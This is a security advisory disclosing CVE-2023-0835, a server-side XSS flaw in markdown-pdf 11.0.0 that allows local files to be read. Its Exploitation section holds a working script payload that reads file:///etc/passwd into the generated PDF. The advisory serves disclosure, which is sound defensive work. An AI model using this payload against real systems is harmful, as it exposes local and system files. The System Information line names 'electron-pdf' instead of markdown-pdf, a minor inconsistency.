CVE-2023-0835: markdown-pdf 11.0.0 - Local File Read via Server Side XSS | Advisories | Fluid Attacks

3. Relsb

Summary

Name

markdown-pdf 11.0.0 - Local File Read

Code name

RelsB

Product

markdown-pdf

Affected versions

Version 11.0.0

State

Public

Release date

2023-04-10

Vulnerability

Kind

Server Side XSS

Rule

425. Server Side XSS

Remote

Yes

CVSSv3 Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSSv3 Base Score

7.5

Exploit available

Yes

CVE ID(s)

CVE-2023-0835

Description

markdown-pdf version 11.0.0 allows an external attacker to remotely obtain arbitrary local files. This is possible because the application does not validate the Markdown content entered by the user.

Vulnerability

This vulnerability occurs because the application does not validate that the Markdown content entered by the user is not malicious.

Exploitation

To exploit this vulnerability, we only need to send the following malicious Markdown to markdown-pdf:

Exploit.md

<script>
    // Path Disclosure
    document.write(window.location);
    // Arbitrary Local File Read
    xhr = new XMLHttpRequest;
    xhr.onload=function(){document.write((this.responseText))};
    xhr.open("GET","file:///etc/passwd");
    xhr.send();
</script>

Thus, when markdown-pdf parses the malicious Markdown, it will return the local file specified in the generated PDF.

Evidence of exploitation

Our security policy

We have reserved the ID CVE-2023-0835 to refer to this issue from now on.

• https://fluidattacks.com/advisories/policy/

System Information

• Version: electron-pdf 11.0.0

• Operating System: GNU/Linux

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks’ Offensive Team.

References

Vendor page https://www.npmjs.com/package/markdown-pdf/

Timeline

2023-02-20

Vulnerability discovered.

2023-02-20

Vendor contacted.

2023-02-20

Vendor replied acknowledging the report.

2023-04-10

Public Disclosure.